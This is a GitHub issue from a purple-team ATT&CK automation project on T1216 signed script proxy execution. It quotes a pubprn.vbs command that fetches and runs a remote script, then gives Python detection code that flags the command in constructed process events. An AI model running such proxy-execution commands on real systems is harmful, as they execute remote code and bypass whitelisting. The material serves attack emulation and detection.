praetorian-inc / purple-team-attack-automation

Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs

T1216W - Signed Script Proxy Execution #26

Open daniel-infosec opened 5 years ago

daniel-infosec commented 5 years ago

Description

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. [1] Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. [2]
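The issue body describes the PubPrn.vbs proxy-execution pattern but not how a defender would spot it in process telemetry. The following is an added example, not code from this repository or from the issue authors: a small detection routine run over constructed Sysmon-style process-creation events. It flags a Windows script host (cscript.exe or wscript.exe) invoking pubprn.vbs with a `script:` moniker as its path argument, and marks the finding as remote when the moniker target is a URL or UNC path. The event field names (`pid`, `image`, `cmdline`), the sample events and the regexes are assumptions made for this example; ordinary PubPrn.vbs use passes an LDAP path as the second argument, which is why only the `script:` form is flagged.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style process-creation events (Event ID 1 fields, trimmed). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 4120, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://192.168.1.100/hi.png"},
    {"pid": 4133, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs printsrv01 "LDAP://CN=printsrv01,OU=Servers,DC=corp,DC=example"'},
    {"pid": 4150, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\alice\logon.vbs"},
    {"pid": 4171, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe pubprn.vbs"},
]

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
PUBPRN_RE = re.compile(r"pubprn\.vbs", re.IGNORECASE)
# The path argument of pubprn.vbs is handed to GetObject(); a "script:" moniker there makes the
# script host fetch and run whatever the moniker points at. Capture the target so the finding can be triaged.
SCRIPT_MONIKER_RE = re.compile(r"script:(?P<target>\S+)", re.IGNORECASE)
# Heuristic (assumption): a URL scheme or a UNC prefix means the target is off-host.
REMOTE_TARGET_RE = re.compile(r"^([a-z][a-z0-9+.-]*://|\\\\)", re.IGNORECASE)


def image_basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def inspect_event(event: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Return a finding for one event, or None when the event does not match the pattern."""
    if image_basename(str(event["image"])) not in SCRIPT_HOSTS:
        return None
    cmdline = str(event["cmdline"])
    if not PUBPRN_RE.search(cmdline):
        return None
    m = SCRIPT_MONIKER_RE.search(cmdline)
    if m is None:
        return None  # normal use passes an LDAP path, not a script: moniker
    target = m.group("target").strip('"')
    return {
        "pid": event["pid"],
        "technique": "T1216",
        "target": target,
        "remote": bool(REMOTE_TARGET_RE.match(target)),
        "cmdline": cmdline,
    }


def detect(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run inspect_event over a batch of events and keep the matches."""
    return [f for f in (inspect_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"pid={finding['pid']} T1216 pubprn.vbs script moniker -> "
              f"{finding['target']} remote={finding['remote']}")
```

Run against the constructed sample, only the first event produces a finding (remote target `http://192.168.1.100/hi.png`); the legitimate LDAP invocation, the unrelated logon script and the non-script-host process are all ignored. In a real pipeline the same logic maps onto a Sysmon or EDR query keyed on the script-host image plus the `pubprn.vbs` and `script:` substrings in the command line.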

jabra- commented 5 years ago

Blog post with sample PoCs: https://p16.praetorian.com/blog/signed-scripts-proxy-execution-t1216